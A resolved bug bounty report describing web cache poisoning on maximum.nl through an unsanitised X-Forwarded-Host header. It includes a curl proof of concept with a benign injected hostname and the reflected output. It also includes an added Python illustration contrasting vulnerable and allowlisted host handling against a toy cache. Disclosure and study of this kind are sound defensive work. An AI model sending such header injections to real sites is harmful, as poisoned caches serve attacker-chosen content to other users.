'X-Forwarded-Host' header used in output without sanitization - possible cache poisoning
Low
## Vulnerability Details
**Domain and URL:**
maximum.nl
**Summary:**
The HTTP 'X-Forwarded-Host' header is used dynamically by the application to build absolute URLs, without any sanitization, so an attacker controls the value that ends up in the response. On its own this yields at most self-XSS, but when a CDN or caching layer sits in front of the application and does not include 'X-Forwarded-Host' in its cache key, the response containing the injected value can be cached and served to other users (web cache poisoning).
PoC:
```
$ curl -v https://www.maximum.nl/ -H 'X-Forwarded-Host: exampleinject' 2>&1 | grep 'exampleinject'
<link rel="alternate" hreflang="nl" type="application/atom+xml" href="https://exampleinject/feed-page" title="Page Feed">
<link rel="alternate" hreflang="nl" type="application/atom+xml" href="https://exampleinject/feed-vacancy" title="Vacancy Feed">
<meta property="og:url" content="https://exampleinject" />
```
Here my input is returned in the web application's response. When cached, it will be returned to other users.
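The following is an added illustration, not code from the report or from maximum.nl: a minimal model of the behaviour described above (an origin that builds its canonical URLs from 'X-Forwarded-Host') beside a hardened variant that only honours the header behind a trusted proxy and only for an allowlisted hostname. A toy cache keyed on method, 'Host' and path, with 'X-Forwarded-Host' left unkeyed, shows how one attacker request poisons what a later plain request receives. The allowlist, the template and the cache are constructed assumptions for the example.

```python
import re
from typing import Callable, Dict, Tuple

# Constructed allowlist of hostnames the site is legitimately served under (assumption).
TRUSTED_HOSTS = {"www.maximum.nl", "maximum.nl"}
# Syntactic check for a host[:port] value; rejects quotes, slashes and spaces.
HOST_RE = re.compile(r"^[a-z0-9.-]+(:\d{1,5})?$", re.IGNORECASE)


def effective_host_vulnerable(headers: Dict[str, str]) -> str:
    """Mirrors the reported behaviour: a client-supplied X-Forwarded-Host wins unconditionally."""
    return headers.get("X-Forwarded-Host") or headers.get("Host", "")


def effective_host_hardened(headers: Dict[str, str], from_trusted_proxy: bool = False) -> str:
    """Honour X-Forwarded-Host only when the request arrived via our own proxy,
    and in every case require a syntactically valid, allowlisted hostname."""
    candidate = headers.get("X-Forwarded-Host") if from_trusted_proxy else None
    if not candidate:
        candidate = headers.get("Host", "")
    if not HOST_RE.match(candidate):
        raise ValueError("malformed host value")
    hostname = candidate.split(":")[0].lower()
    if hostname not in TRUSTED_HOSTS:
        raise ValueError(f"untrusted host {candidate!r}")
    return candidate


def render_page(host: str) -> str:
    """Constructed template with the same kind of tags the PoC output shows."""
    return (
        f'<link rel="alternate" hreflang="nl" type="application/atom+xml" '
        f'href="https://{host}/feed-page" title="Page Feed">\n'
        f'<meta property="og:url" content="https://{host}" />'
    )


class ToyCache:
    """Cache keyed on (method, Host, path) only: X-Forwarded-Host is an unkeyed input,
    which is exactly the condition that turns reflection into cache poisoning."""

    def __init__(self) -> None:
        self.store: Dict[Tuple[str, str, str], str] = {}

    def fetch(self, headers: Dict[str, str], path: str,
              origin: Callable[[Dict[str, str]], Tuple[int, str]]) -> Tuple[int, str, bool]:
        key = ("GET", headers.get("Host", ""), path)
        if key in self.store:
            return 200, self.store[key], True          # served from cache
        status, body = origin(headers)
        if status == 200:                              # only successful responses are stored
            self.store[key] = body
        return status, body, False


def poisoned_by_attacker(host_fn: Callable[[Dict[str, str]], str]) -> bool:
    """Prime the cache with an attacker request carrying X-Forwarded-Host, then check
    whether a later plain request for the same URL is served the injected hostname."""
    cache = ToyCache()

    def origin(headers: Dict[str, str]) -> Tuple[int, str]:
        try:
            return 200, render_page(host_fn(headers))
        except ValueError as exc:
            return 400, f"bad request: {exc}"

    attacker = {"Host": "www.maximum.nl", "X-Forwarded-Host": "exampleinject"}
    victim = {"Host": "www.maximum.nl"}
    cache.fetch(attacker, "/", origin)                 # attacker's request fills the cache entry
    _status, body, _hit = cache.fetch(victim, "/", origin)
    return "exampleinject" in body


if __name__ == "__main__":
    print("vulnerable origin poisoned:", poisoned_by_attacker(effective_host_vulnerable))
    print("hardened origin poisoned:  ", poisoned_by_attacker(effective_host_hardened))
```

The same script can double as a quick regression check: an origin whose host selection passes `poisoned_by_attacker` is one the cache in front of it cannot protect, regardless of what the cache's `Vary` or key configuration looks like, because the unsafe value is baked into the body before the cache ever sees it.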
## Steps To Reproduce:
See PoC
## Impact
Injected response being returned to users
## Report Stats
- Report ID: 737315
- State: Closed
- Substate: resolved
- Upvotes: 10